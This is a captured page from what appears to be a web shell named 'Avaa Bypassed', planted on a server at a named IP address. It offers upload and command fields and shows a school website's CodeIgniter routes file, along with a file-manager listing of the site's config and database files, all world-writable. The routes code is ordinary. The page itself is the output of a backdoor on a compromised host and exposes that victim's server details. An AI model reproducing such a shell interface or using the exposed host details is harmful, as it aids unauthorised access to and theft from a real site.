[ Avaa Bypassed ]




Upload:

Command:

www-data@18.119.128.99: ~ $
<?php
defined('BASEPATH') OR exit('No direct script access allowed');

/*
| -------------------------------------------------------------------------
| URI ROUTING
| -------------------------------------------------------------------------
| This file lets you re-map URI requests to specific controller functions.
|
| Typically there is a one-to-one relationship between a URL string
| and its corresponding controller class/method. The segments in a
| URL normally follow this pattern:
|
|	example.com/class/method/id/
|
| In some instances, however, you may want to remap this relationship
| so that a different class/function is called than the one
| corresponding to the URL.
|
| Please see the user guide for complete details:
|
|	https://codeigniter.com/user_guide/general/routing.html
|
| -------------------------------------------------------------------------
| RESERVED ROUTES
| -------------------------------------------------------------------------
|
| There are three reserved routes:
|
|	$route['default_controller'] = 'welcome';
|
| This route indicates which controller class should be loaded if the
| URI contains no data. In the above example, the "welcome" class
| would be loaded.
|
|	$route['404_override'] = 'errors/page_missing';
|
| This route will tell the Router which controller/method to use if those
| provided in the URL cannot be matched to a valid route.
|
|	$route['translate_uri_dashes'] = FALSE;
|
| This is not exactly a route, but allows you to automatically route
| controller and method names that contain dashes. '-' isn't a valid
| class or method name character, so it requires translation.
| When you set this option to TRUE, it will replace ALL dashes in the
| controller and method URI segments.
|
| Examples:	my-controller/index	-> my_controller/index
|		my-controller/my-method	-> my_controller/my_method
*/

//$route['(:any)/home']= 'home/index';
//$route['(:any)']
$route['default_controller'] = "web/web/index";
$route['(:any)'] = 'web/school/$1';
$route['(:any)/about'] = 'web/about';
$route['(:any)/head_message'] = 'web/head_message';
$route['(:any)/head_served'] = 'web/head_served';
$route['(:any)/news'] = 'web/news';
$route['(:any)/workshop'] = 'web/workshop';
$route['(:any)/news-detail/(:num)'] = 'web/news_detail/$1';
$route['(:any)/workshop-detail/(:num)'] = 'web/workshop_detail/$1';
$route['(:any)/profile_detail/(:num)'] = 'web/profile_detail/$1';

$route['(:any)/publication-detail/(:num)'] = 'web/publication-detail/$1';

$route['(:any)/notice'] = 'web/notice';
$route['(:any)/notice-detail/(:num)'] = 'web/notice_detail/$1';
$route['(:any)/holiday'] = 'web/holiday';
$route['(:any)/holiday-detail/(:num)'] = 'web/holiday_detail/$1';
$route['(:any)/events'] = 'web/events';
$route['(:any)/event-detail/(:num)'] = 'web/event_detail/$1';
$route['(:any)/galleries'] = 'web/galleries';
$route['(:any)/gallery-image/(:num)'] = 'web/gallery_image/$1';
$route['(:any)/teachers/(:any)'] = 'web/teachers/$1';
$route['(:any)/students/(:any)'] = 'web/students/$1';
$route['(:any)/staff/(:any)'] = 'web/staff/$1';
$route['(:any)/resources_others'] = 'web/resources_others';
$route['(:any)/resources_students'] = 'web/resources_students';
$route['(:any)/academic_calender'] = 'web/academic_calender';
$route['(:any)/student_notices'] = 'web/student_notices';
$route['(:any)/class_routine'] = 'web/class_routine';
$route['(:any)/faq'] = 'web/faq';
$route['(:any)/publication'] = 'web/publication';
$route['(:any)/contact'] = 'web/contact';
$route['(:any)/admission-online'] = 'web/admission_online';
$route['(:any)/admission-form'] = 'web/admission_form';
$route['(:any)/page/(:any)'] = 'web/page/$1';

//$route['login'] = 'welcome';
$route['(:any)/login'] = 'auth/login';
$route['(:any)/logout'] = 'auth/logout';
$route['(:any)/forgot'] = 'auth/forgot';
$route['auth/reset/(:any)'] = 'auth/reset/$1';
$route['404_override'] = 'notfound';
$route['translate_uri_dashes'] = FALSE;





//$route['default_controller'] = 'home';
//$route['404_override'] = 'notfound';
//$route['translate_uri_dashes'] = FALSE;


Filemanager

Name Type Size Permission Actions
autoload.php File 4.08 KB 0777
config.php File 20.23 KB 0777
constants.php File 4.22 KB 0777
custom.php File 87.59 KB 0777
database.php File 6 KB 0777
doctypes.php File 2.38 KB 0777
foreign_chars.php File 2.92 KB 0777
hooks.php File 417 B 0777
index.html File 131 B 0777
memcached.php File 498 B 0777
migration.php File 2.96 KB 0777
mimes.php File 9.82 KB 0777
profiler.php File 477 B 0777
routes.php File 3.97 KB 0777
smileys.php File 3.11 KB 0777
user_agents.php File 5.99 KB 0777